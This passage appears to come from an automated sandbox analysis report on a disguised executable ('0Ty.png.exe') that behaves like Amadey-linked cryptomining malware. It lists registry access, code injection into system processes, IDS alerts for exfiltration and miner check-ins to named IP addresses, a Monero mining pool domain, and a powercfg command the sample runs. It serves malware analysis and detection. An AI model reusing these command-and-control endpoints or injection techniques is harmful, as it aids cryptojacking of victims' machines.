            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
            Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_000002408A29E110 FindFirstFileExW,31_2_000002408A29E110
            Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000014ECB4AE110 FindFirstFileExW,67_2_0000014ECB4AE110
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC64E110 FindFirstFileExW,69_2_00000225DC64E110
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC67E110 FindFirstFileExW,69_2_00000225DC67E110
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AEE110 FindFirstFileExW,70_2_00000202C0AEE110
            Source: C:\Windows\System32\svchost.exeCode function: 71_2_000002A66130E110 FindFirstFileExW,71_2_000002A66130E110
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE0E110 FindFirstFileExW,72_2_000002BAAEE0E110
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_000002488060E110 FindFirstFileExW,73_2_000002488060E110

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.4:49731 -> 85.209.133.29:80
            Source: global trafficTCP traffic: 192.168.2.4:49730 -> 194.164.234.171:10128
            Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
            Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.4:49775 -> 85.209.133.29:80
            Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.4:49755 -> 85.209.133.29:80
            Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49730 -> 194.164.234.171:10128
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownTCP traffic detected without corresponding DNS query: 85.209.133.29
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: gulf.moneroocean.stream
            Source: unknownHTTP traffic detected: POST /lowkey/api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 283Content-Type: application/jsonHost: 85.209.133.29User-Agent: cpp-httplib/0.12.6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-length: 14date: Wed, 25 Dec 2024 16:23:07 GMTData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: File not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-length: 14date: Wed, 25 Dec 2024 16:24:06 GMTData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: File not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-length: 14date: Wed, 25 Dec 2024 16:25:06 GMTData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: File not found
            Source: powershell.exe, 0000001C.00000002.1836172170.000001BF90219000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000001C.00000002.1767100204.000001BF8022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: dialer.exe, 00000018.00000003.1719273538.0000027DD0413000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000018.00000002.1719637666.0000027DD0417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.m
            Source: powershell.exe, 0000001C.00000002.1767100204.000001BF80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000001C.00000002.1767100204.000001BF8022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 0000001C.00000002.1767100204.000001BF80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000001C.00000002.1767100204.000001BF8022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000001C.00000002.1767100204.000001BF81151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
            Source: 00000041.00000002.2936453016.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Uses powercfg.exe to modify the power settings
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8B0FE4 NtResumeThread,28_2_00007FFD9B8B0FE4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8ADF98 NtUnmapViewOfSection,28_2_00007FFD9B8ADF98
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8B0F20 NtSetContextThread,28_2_00007FFD9B8B0F20
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8B0C5D NtWriteVirtualMemory,28_2_00007FFD9B8B0C5D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8B0A3E NtUnmapViewOfSection,28_2_00007FFD9B8B0A3E
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8AE078 NtUnmapViewOfSection,28_2_00007FFD9B8AE078
            Source: C:\Windows\System32\dialer.exeCode function: 64_2_0000000140001394 NtOpenKey,64_2_0000000140001394
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8B1004 NtResumeThread,66_2_00007FFD9B8B1004
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8B0F40 NtSetContextThread,66_2_00007FFD9B8B0F40
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8B0C7D NtWriteVirtualMemory,66_2_00007FFD9B8B0C7D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8AE0C8 NtUnmapViewOfSection,66_2_00007FFD9B8AE0C8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8B0A5E NtUnmapViewOfSection,66_2_00007FFD9B8B0A5E
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8AE098 NtUnmapViewOfSection,66_2_00007FFD9B8AE098
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 66_2_00007FFD9B8AE0A8 NtUnmapViewOfSection,66_2_00007FFD9B8AE0A8
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_0000000140001860 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,68_2_0000000140001860
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC642990 NtEnumerateValueKey,NtEnumerateValueKey,69_2_00000225DC642990
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AE2604 NtQueryDirectoryFileEx,GetFileType,StrCpyW,70_2_00000202C0AE2604
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AE211C NtQuerySystemInformation,StrCmpNIW,70_2_00000202C0AE211C
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE02990 NtEnumerateValueKey,NtEnumerateValueKey,72_2_000002BAAEE02990
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_0000000140001860 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,73_2_0000000140001860
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeFile created: C:\Windows\TEMP\ihddniqxcjeb.sysJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_e5142syl.zjb.ps1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8AF63E28_2_00007FFD9B8AF63E
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8ADD5828_2_00007FFD9B8ADD58
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8AE32928_2_00007FFD9B8AE329
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8AFDE928_2_00007FFD9B8AFDE9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8AF65928_2_00007FFD9B8AF659
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFD9B8ADCD328_2_00007FFD9B8ADCD3
            Source: C:\Windows\System32\conhost.exeCode function: 31_3_0000024089941FF431_3_0000024089941FF4
            Source: C:\Windows\System32\conhost.exeCode function: 31_3_0000024089953CD831_3_0000024089953CD8
            Source: C:\Windows\System32\conhost.exeCode function: 31_3_000002408994D51031_3_000002408994D510
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_000002408A2A48D831_2_000002408A2A48D8
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_000002408A29E11031_2_000002408A29E110
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_000002408A292BF431_2_000002408A292BF4
            Source: C:\Windows\System32\dialer.exeCode function: 64_2_000000014000324064_2_0000000140003240
